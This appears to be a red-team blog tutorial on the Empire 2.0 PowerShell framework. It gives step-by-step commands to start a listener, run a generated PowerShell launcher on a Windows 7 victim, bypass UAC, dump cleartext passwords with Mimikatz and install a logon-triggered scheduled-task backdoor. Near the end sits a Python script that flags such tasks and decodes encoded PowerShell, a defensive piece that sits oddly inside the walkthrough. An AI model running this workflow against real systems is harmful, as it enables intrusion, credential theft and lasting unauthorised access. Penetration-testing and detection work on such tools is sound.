Empire PowerShell Tutorial For PenTesters & Redteams

Hi, this is Gus, and welcome to this exciting lesson about the new version 2.0 of Empire.

I’m pretty sure you’re curious and want to learn how to use it. In this lesson, I will walk you through it and show you all the tricks so you can achieve your goals as a member of a red team or as a penetration tester.

Let’s look together at the workflow that I’ll be using for this demo.

[Screenshot 01: Workflow]

First, I will show you how to install Empire.

Second, you will learn how to create a listener. If you don’t know what a listener is, its name explains what it does: the listener listens for incoming connections from infected victims.

Next, I will show you how to create a script to send it to your victim using the launcher in Empire.

Now, when the victim executes the script, the machine connects back to the listener, and this creates an agent representing the victim machine.

All we need at this stage is to interact with the agent and escalate our privileges so we become an admin. Why? Because with admin privileges you can, for example, run Mimikatz to extract the victim’s passwords.

Finally, I will make sure that you learn how to create a persistent backdoor so you can go back anytime you want.

Before I start this demo, I want to let you know that this blog post has a video demo on YouTube:

Let’s start the action!

First, open your browser and go to the Empire GitHub website and click on the “Clone or download” button to copy the URL to your clipboard.

Now open your terminal window, run git clone and paste the URL:

$ git clone https://github.com/EmpireProject/Empire.git

[Screenshot 02: git]

This will download Empire into the root user’s home directory on Kali.

 

Let’s explore this new folder.

If I check the contents of the Empire directory, I can see the setup folder.

Now I’m pretty sure that our installer is somewhere in here.

Here you go, it’s the install.sh file.

Let’s give it the right permission and execute it to install Empire.

$ chmod +x install.sh

$ ./install.sh

 

[Screenshot 03: install]

The installation is going to take some time, so be patient. After a while, the installer will ask you to enter a password or press Enter to generate a random one. I’m going to press Enter, and we’re done!

[Screenshot 04: password]

I will go up one directory to execute the Empire application, but before doing this I will give it the right permission as well.

$ cd ..

$ ls

$ chmod +x empire

[Screenshot 05: pre execute]

Perfect, it’s time to execute this monster.

[Screenshot 06: execute]

Voila! This is the Empire home screen. As you can see, we have 267 modules ready to be used and no listeners or agents, which is normal because it’s a fresh copy of Empire.

[Screenshot 07: home screen]

Let’s start by creating a listener. Type listeners:

$> listeners

And you will get this message:

[!] No listeners currently active

[Screenshot 08: listeners]

Wait, this is not an error message; check the prompt, it changed to listeners mode.

Next, I will choose the http-based listener, so type:

$> uselistener http

And the prompt changed to the http listener. Alright, it’s time to execute it:

$> execute

Amazing! We should have a listener active at this moment.

Here in the details it shows that the name of this listener is http and it’s listening on port 80 on my Kali Linux machine.

[Screenshot 09: listeners info]

At this stage we need to create a launcher. Just type launcher in the terminal window and you get this message:

[Screenshot 010: launcher help]

Going by this message, let’s generate a PowerShell script for the listener named http:

$> launcher powershell http

[Screenshot 011: launcher powershell]

Perfect, let’s copy this PowerShell script so it is ready for our Windows 7 machine.

I will open a new terminal window and use rdesktop to connect to the victim machine: -u is for the user name, -p is for the password, followed by the IP address of the Windows 7 host.

$ rdesktop -u [user name] -p [password] [Windows 7 IP address]

[Screenshot 012: rdesktop]

Let’s open a command prompt in Windows and paste the PowerShell script.

[Screenshot 013: paste cmd]

 

Beautiful, let’s go back to the Empire terminal window, and we have an agent active.

[Screenshot 014: InitAgent]

Type back to go to the main menu, and there type agents to list the available agents:

$> back

$> agents

[Screenshot 015: agents list]

We can see all the information that represents our Win7 machine, but the name is very random, so I will rename it to something more meaningful.

Type rename followed by the first two letters of the name, then press Tab and it will autocomplete. Then type the desired new name.

$> rename [old name] [new name]

[Screenshot 016: rename agent1]

To list the agents at this stage, type list:

$> list

[Screenshot 017: list agent1]

And here you go, our new name for the Windows 7 agent.

Let’s try to interact with this agent, and type info to see the necessary information about it:

$> interact [agent name]

$> info

[Screenshot 018: interact agent1]

[Screenshot 019: info agent1]

 

Pay attention here: the high integrity flag is set to 0, because we are not admin. The next step is to elevate our privileges. We can become an admin with a single command called bypassuac, followed by the name of the listener:

$> bypassuac http

[Screenshot 020: bypassuac]

Wait for a couple of seconds and you should see some output coming your way, and we have a new agent.

Press Enter, go back and execute the list command to see the new agent:

$> [enter]

$> back

$> list

[Screenshot 021: list agent2]

 

Check the difference: here we have an asterisk before the username, which means this is an elevated agent. Let’s rename this new agent:

$> rename [old name] [new name]

Let’s start interacting with this new agent:

$> interact [agent name]

$> info

[Screenshot 022: interact agent2]

Pay attention to the high integrity: it’s 1 instead of zero.

[Screenshot 023: high integrity]

Perfect, let’s run Mimikatz to extract the cleartext passwords. But first, type creds to list all the cleartext passwords collected so far, and it’s empty.

$> creds

[Screenshot 024: creds1]

Next, run mimikatz and wait a few seconds for it to finish executing.

$> mimikatz

[Screenshot 025: mimikatz]

Awesome! Let’s see the credential list, and here you go, all the passwords have been extracted for us.

$> creds

[Screenshot 026: creds2]

It’s time for our final stage: the persistent backdoor. If you’re ever lost in this application, you always have the option to type the help command to see the available choices:

$> help

[Screenshot 027: help]

To create a persistent backdoor, I will use the schtasks module in Empire:

$> usemodule persistence/elevated/schtasks

[Screenshot 028: schtasks]

Let’s check its options. I will set onLogon to True because I want it to execute every time the victim user logs in to this machine, and set the listener name to http.

And finally execute it:

$> info

$> set onLogon True

$> set Listener http

$> execute

[Screenshot 029: persistence options]

[Screenshot 030: execute persistence]

And we now have a persistent backdoor, with great success.
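The logon-triggered scheduled task that the persistence step above registers, like the encoded PowerShell launcher pasted on the victim earlier, leaves a definition a defender can inspect. As an added example that is not part of this tutorial or of Empire, here is a Python audit of an exported Task Scheduler XML file (assumptions made here: the Task Scheduler XML layout, the list of PowerShell switches treated as suspicious, and the constructed sample task).

```python
import base64
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# PowerShell switches typical of hidden, encoded one-liners (assumed indicator list).
SUSPICIOUS_FLAGS = re.compile(r"-(?:nop|noprofile|noni|noninteractive|sta|w\s+(?:hidden|1)"
                              r"|windowstyle\s+hidden|enc|encodedcommand)\b", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(arguments):
    """Return the script behind -enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_task(xml_text):
    """Report whether the task fires at logon and what PowerShell each action runs."""
    root = ET.fromstring(xml_text)
    logon = root.find("t:Triggers/t:LogonTrigger", TASK_NS) is not None
    findings = []
    for node in root.findall("t:Actions/t:Exec", TASK_NS):
        cmd = node.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = node.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        if "powershell" not in cmd.lower():
            continue  # only PowerShell actions are of interest here
        flags = sorted({f.lower() for f in SUSPICIOUS_FLAGS.findall(args)})
        findings.append({"command": cmd, "flags": flags,
                         "decoded": decode_encoded_command(args)})
    # Logon trigger plus hidden/encoded PowerShell is the combination worth alerting on.
    suspicious = logon and any(f["flags"] for f in findings)
    return {"logon_triggered": logon, "findings": findings, "suspicious": suspicious}


# Constructed sample: a logon task whose action is an encoded PowerShell command.
STAGER = "Write-Host 'constructed sample'"  # stands in for a real stager script
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_TASK = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-NoP -NonI -W Hidden -Enc {ENCODED}</Arguments>
  </Exec></Actions>
</Task>"""
```

On a real host, export tasks with schtasks /query /xml and feed each definition to audit_task; the decoded field shows what the task would actually run.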

Thank you for reading this tutorial. I hope that you liked it. Until next time!
